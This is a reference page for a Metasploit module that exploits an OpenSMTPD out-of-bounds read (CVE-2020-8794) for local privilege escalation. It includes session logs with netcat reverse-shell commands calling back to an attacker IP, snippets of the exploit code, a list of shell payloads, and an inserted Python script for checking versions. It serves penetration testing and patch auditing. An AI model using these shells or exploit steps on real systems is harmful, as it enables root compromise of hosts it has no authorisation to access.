OpenSMTPD OOB Read Local Privilege Escalation - Metasploit
This page contains detailed information about how to use the exploit/unix/local/opensmtpd_oob_read_lpe Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: OpenSMTPD OOB Read Local Privilege Escalation
Module: exploit/unix/local/opensmtpd_oob_read_lpe
Source code: modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
Disclosure date: 2020-02-24
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2020-8794
This module exploits an out-of-bounds read of an attacker-controlled string in OpenSMTPD's MTA implementation to execute a command as the root or nobody user, depending on the kind of grammar OpenSMTPD uses.
Module Ranking and Traits
Module Ranking:
- average: The exploit is generally unreliable or difficult to exploit.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-service-down: Module may crash the service, and the service remains down.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.
msf > use exploit/unix/local/opensmtpd_oob_read_lpe
msf exploit(opensmtpd_oob_read_lpe) > show targets
... a list of targets ...
msf exploit(opensmtpd_oob_read_lpe) > set TARGET target-id
msf exploit(opensmtpd_oob_read_lpe) > show options
... show and set options ...
msf exploit(opensmtpd_oob_read_lpe) > set SESSION session-id
msf exploit(opensmtpd_oob_read_lpe) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
Description
This module exploits an out-of-bounds read of an attacker-controlled string in OpenSMTPD's MTA implementation to execute a command as the root or nobody user, depending on the kind of grammar OpenSMTPD uses.
Setup
- Download OpenBSD 6.6
- Install the system
Verification Steps
Targets
0
This targets OpenSMTPD versions < 6.6.4 by automatically selecting the appropriate grammar.
Options
SESSION
Set this to a valid session ID on an OpenBSD target.
Scenarios
OpenSMTPD 6.6.0 on OpenBSD 6.6
msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > options
Module options (exploit/unix/local/opensmtpd_oob_read_lpe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  25               yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   OpenSMTPD < 6.6.4 (automatic grammar selection)
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
session => 1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
[+] mkfifo /tmp/gkhbba; nc 172.16.249.1 4444 0/tmp/gkhbba 2>&1; rm /tmp/gkhbba
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] OpenSMTPD 6.6.0 is using new grammar
[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794.
[*] Started service listener on 0.0.0.0:25
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'brvaysxuzssmnjkysoh@[172.16.249.1]' < /dev/null && echo true
[*] Client 172.16.249.137:37747 connected
[*] Exploiting new OpenSMTPD grammar for a root shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[+] Received: EHLO
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[+] Received: foo.localdomain
MAIL FROM:/tmp/rettgqm 2>&1; rm /tmp/rettgqm; exit 0
[*] Disconnecting client 172.16.249.137:37747
[*] Command shell session 3 opened (172.16.249.1:4444 -> 172.16.249.137:3005) at 2020-03-03 18:40:54 -0600
[*] Server stopped.
id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
^Z
Background session 3? [y/N] y
OpenSMTPD 6.0.4 on OpenBSD 6.3
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2
session => 2
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
[+] mkfifo /tmp/hkioy; nc 172.16.249.1 4444 0/tmp/hkioy 2>&1; rm /tmp/hkioy
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] OpenSMTPD 6.0.4 is using old grammar
[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794.
[*] Started service listener on 0.0.0.0:25
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'nozahdogyxewkv@[172.16.249.1]' < /dev/null && echo true
[*] Client 172.16.249.138:10203 connected
[*] Exploiting old OpenSMTPD grammar for a nobody shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[+] Received: EHLO
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[+] Received: foo.localdomain
MAIL FROM:
mda-user: nobody
mda-buffer: mkfifo /tmp/jszy; nc 172.16.249.1 4444 0/tmp/jszy 2>&1; rm /tmp/jszy; exit 0
[*] Disconnecting client 172.16.249.138:10203
[*] Command shell session 4 opened (172.16.249.1:4444 -> 172.16.249.138:40377) at 2020-03-03 18:41:06 -0600
[*] Server stopped.
id
uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
uname -a
OpenBSD foo.localdomain 6.3 GENERIC#100 amd64
Msfconsole Usage
Here is how the unix/local/opensmtpd_oob_read_lpe exploit module looks in the msfconsole:
msf6 > use exploit/unix/local/opensmtpd_oob_read_lpe
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(unix/local/opensmtpd_oob_read_lpe) > show info
Name: OpenSMTPD OOB Read Local Privilege Escalation
Module: exploit/unix/local/opensmtpd_oob_read_lpe
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2020-02-24
Provided by:
Qualys
wvu <[email protected]>
Module side effects:
ioc-in-logs
Module stability:
crash-service-down
Module reliability:
repeatable-session
Available targets:
   Id  Name
   --  ----
   0   OpenSMTPD < 6.6.4 (automatic grammar selection)
Check supported:
Yes
Basic options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  25               yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
Payload information:
Description:
This module exploits an out-of-bounds read of an attacker-controlled
string in OpenSMTPD's MTA implementation to execute a command as the
root or nobody user, depending on the kind of grammar OpenSMTPD
uses.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-8794
https://seclists.org/oss-sec/2020/q1/96
Module Options
This is a complete list of options available in the unix/local/opensmtpd_oob_read_lpe exploit:
msf6 exploit(unix/local/opensmtpd_oob_read_lpe) > show options
Module options (exploit/unix/local/opensmtpd_oob_read_lpe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  25               yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   OpenSMTPD < 6.6.4 (automatic grammar selection)
Advanced Options
Here is a complete list of advanced options supported by the unix/local/opensmtpd_oob_read_lpe exploit:
msf6 exploit(unix/local/opensmtpd_oob_read_lpe) > show advanced
Module advanced options (exploit/unix/local/opensmtpd_oob_read_lpe):
   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AutoCheck               true             no        Run check before exploit
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ExpectTimeout           3.5              yes       Timeout for Expect
   ForceExploit            false            no        Override check result
   ListenerComm                             no        The specific communication channel to use for this service
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
Payload advanced options (cmd/unix/reverse_netcat):
   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the unix/local/opensmtpd_oob_read_lpe module can exploit:
msf6 exploit(unix/local/opensmtpd_oob_read_lpe) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   OpenSMTPD < 6.6.4 (automatic grammar selection)
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the unix/local/opensmtpd_oob_read_lpe exploit:
msf6 exploit(unix/local/opensmtpd_oob_read_lpe) > show payloads
Compatible Payloads
===================
   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_inetd                                  normal  No     Unix Command Shell, Bind TCP (inetd)
   3   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   4   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   5   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   6   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   7   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   8   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   9   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   10  payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   11  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   12  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   13  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   14  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   15  payload/cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   16  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   17  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   18  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   19  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   20  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   21  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   22  payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   23  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   24  payload/cmd/unix/reverse_bash_udp                            normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   25  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   26  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   27  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   28  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   29  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   30  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   31  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   32  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   33  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   34  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   35  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   36  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   37  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   38  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   39  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   40  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   41  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   42  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   43  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   44  payload/cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   45  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   46  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   47  payload/generic/custom                                       normal  No     Custom Payload
   48  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   49  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the unix/local/opensmtpd_oob_read_lpe exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(unix/local/opensmtpd_oob_read_lpe) > show evasion
Module evasion options:
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maximum tcp segment size. (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
smtpd(8) help could not be displayed.
Here is a relevant code snippet related to the "smtpd(8) help could not be displayed." error message:
  def check
    smtpd_help = cmd_exec('smtpd -h')

    if smtpd_help.empty?
      return CheckCode::Unknown('smtpd(8) help could not be displayed.')
    end

    version = smtpd_help.scan(/^version: OpenSMTPD ([\d.p]+)$/).flatten.first

    unless version
OpenSMTPD version could not be found.
Here is a relevant code snippet related to the "OpenSMTPD version could not be found." error message:
    end

    version = smtpd_help.scan(/^version: OpenSMTPD ([\d.p]+)$/).flatten.first

    unless version
      return CheckCode::Unknown('OpenSMTPD version could not be found.')
    end

    version = Rex::Version.new(version)

    if version < target[:patched_version]
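As an added defender-side example (not the module's own code), the same version check in Python for a patch audit on an OpenSMTPD host: it reuses the page's `smtpd -h` regex and the 6.6.4 fixed version, treats the portable `pN` suffix as a trailing patch level (an assumption of this example, chosen so that 6.6.4p1 counts as patched), and runs on a constructed sample banner.

```python
import re
from typing import Optional, Tuple

# Same regex the module's check() applies to `smtpd -h` output.
VERSION_RE = re.compile(r"^version: OpenSMTPD ([\d.p]+)$", re.MULTILINE)

# Fixed release named on this page: the module targets OpenSMTPD < 6.6.4.
PATCHED_VERSION = "6.6.4"

# Constructed sample of `smtpd -h` output (not captured from a real host).
SAMPLE_HELP = (
    "usage: smtpd [-dFhnv] [-D macro=value] [-f file] [-P system] [-T trace]\n"
    "version: OpenSMTPD 6.6.0p1\n"
)


def parse_version(ver: str) -> Tuple[int, ...]:
    """Turn '6.6.0p1' into a comparable tuple (6, 6, 0, 1).

    Assumption of this example: the portable 'pN' suffix is a trailing
    patch level, so 6.6.0p1 sorts after 6.6.0 and before 6.6.1, and
    6.6.4p1 counts as patched. A version with no suffix gets patch level 0.
    """
    m = re.fullmatch(r"(\d+(?:\.\d+)*)(?:p(\d+))?", ver)
    if not m:
        raise ValueError(f"unrecognised OpenSMTPD version string: {ver!r}")
    nums = [int(x) for x in m.group(1).split(".")]
    while len(nums) < 3:  # pad so '6.6' compares like '6.6.0'
        nums.append(0)
    return tuple(nums) + (int(m.group(2) or 0),)


def extract_version(help_output: str) -> Optional[str]:
    """Return the version string from `smtpd -h` output, or None."""
    m = VERSION_RE.search(help_output)
    return m.group(1) if m else None


def assess(help_output: str) -> str:
    """Classify a host the way the module's check() does, for a patch audit.

    Returns a string starting with 'unknown', 'vulnerable' or 'patched'.
    """
    if not help_output.strip():
        return "unknown: smtpd(8) help could not be displayed"
    ver = extract_version(help_output)
    if ver is None:
        return "unknown: OpenSMTPD version could not be found"
    if parse_version(ver) < parse_version(PATCHED_VERSION):
        return f"vulnerable: OpenSMTPD {ver} is below {PATCHED_VERSION} (CVE-2020-8794)"
    return f"patched: OpenSMTPD {ver} is {PATCHED_VERSION} or later"


if __name__ == "__main__":
    # On a real host, feed assess() the captured output of `smtpd -h`.
    print(assess(SAMPLE_HELP))
```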
OpenSMTPD <VERSION> is NOT vulnerable to CVE-2020-8794.
Here is a relevant code snippet related to the "OpenSMTPD <VERSION> is NOT vulnerable to CVE-2020-8794." error message:
      return CheckCode::Appears(
        "OpenSMTPD #{version} appears vulnerable to CVE-2020-8794."
      )
    end

    CheckCode::Safe("OpenSMTPD #{version} is NOT vulnerable to CVE-2020-8794.")
  end

  def exploit
    start_service

Could not send mail. Is OpenSMTPD running?
Here is a relevant code snippet related to the "Could not send mail. Is OpenSMTPD running?" error message:

    sendmail = "/usr/sbin/sendmail '#{rcpt_to}' < /dev/null && echo true"

    print_status("Executing local sendmail(8) command: #{sendmail}")
    if cmd_exec(sendmail) != 'true'
      fail_with(Failure::Unknown, 'Could not send mail. Is OpenSMTPD running?')
    end
  end

  def on_client_connect(client)
    print_status("Client #{client.peerhost}:#{client.peerport} connected")
Could not determine OpenSMTPD grammar
Here is a relevant code snippet related to the "Could not determine OpenSMTPD grammar" error message:
      mda-usertable: <getpwnam>
      mda-user: nobody
      mda-buffer: #{payload.encoded}; exit 0\x00
    EOF
    else
      fail_with(Failure::BadConfig, 'Could not determine OpenSMTPD grammar')
    end

    sploit = {
      '220' => /EHLO /,
      '250' => /MAIL FROM:<[^>]/,
Related Pull Requests
- #15556 Merged Pull Request: Add shell support to enum_unattended module
- #15564 Merged Pull Request: Update post_common mixin methods to support powershell session type
- #15570 Merged Pull Request: Fix smb enum gpp module
- #15546 Merged Pull Request: Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads
- #15561 Merged Pull Request: Add an exploit for ProxyShell
- #15525 Merged Pull Request: Add Lucee Administrator CVE-2021-21307 exploit
- #15332 Merged Pull Request: fix a localization issue and some other minor issues in rename_file method
- #15540 Merged Pull Request: Add option for running cmd_execute in a subshell
- #15303 Merged Pull Request: Fix dir method for windows shell sessions
- #15547 Merged Pull Request: Bump rex-text to 0.2.36
See Also
Check also the following modules related to this module:
- exploit/unix/smtp/opensmtpd_mail_from_rce
- exploit/unix/local/at_persistence
- exploit/unix/local/chkrootkit
- exploit/unix/local/emacs_movemail
- exploit/unix/local/exim_perl_startup
- exploit/unix/local/netbsd_mail_local
- exploit/unix/local/setuid_nmap
- exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe
- exploit/linux/local/pihole_remove_commands_lpe
- exploit/linux/local/vmware_workspace_one_access_certproxy_lpe
- exploit/linux/local/zyxel_suid_cp_lpe
- exploit/osx/local/vmware_fusion_lpe
- exploit/windows/local/anyconnect_lpe
- exploit/windows/local/cve_2017_8464_lnk_lpe
- exploit/windows/local/cve_2020_1054_drawiconex_lpe
- exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
- auxiliary/dos/windows/nat/nat_helper
- auxiliary/server/dns/spoofhelper
- exploit/linux/local/libuser_roothelper_priv_esc
- exploit/linux/local/ptrace_traceme_pkexec_helper
- exploit/linux/misc/mongod_native_helper
- exploit/windows/browser/ms13_090_cardspacesigninhelper
- exploit/windows/http/adobe_robohelper_authbypass
- exploit/windows/local/bypassuac_fodhelper
- exploit/linux/local/netfilter_xtables_heap_oob_write_priv_esc
Related Nessus plugins:
- FreeBSD : OpenSMTPd -- LPE and RCE in OpenSMTPD's default install (40c75597-574a-11ea-bff8-c85b76ce9b5a)
- FreeBSD : OpenSMTPd -- LPE and RCE in OpenSMTPD's default install (f0683976-5779-11ea-8a77-1c872ccb1e42)
- Debian DSA-4634-1 : opensmtpd - security update
- Ubuntu 18.04 LTS / 19.10 : OpenSMTPD vulnerabilities (USN-4294-1)
Authors
- Qualys
- wvu
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.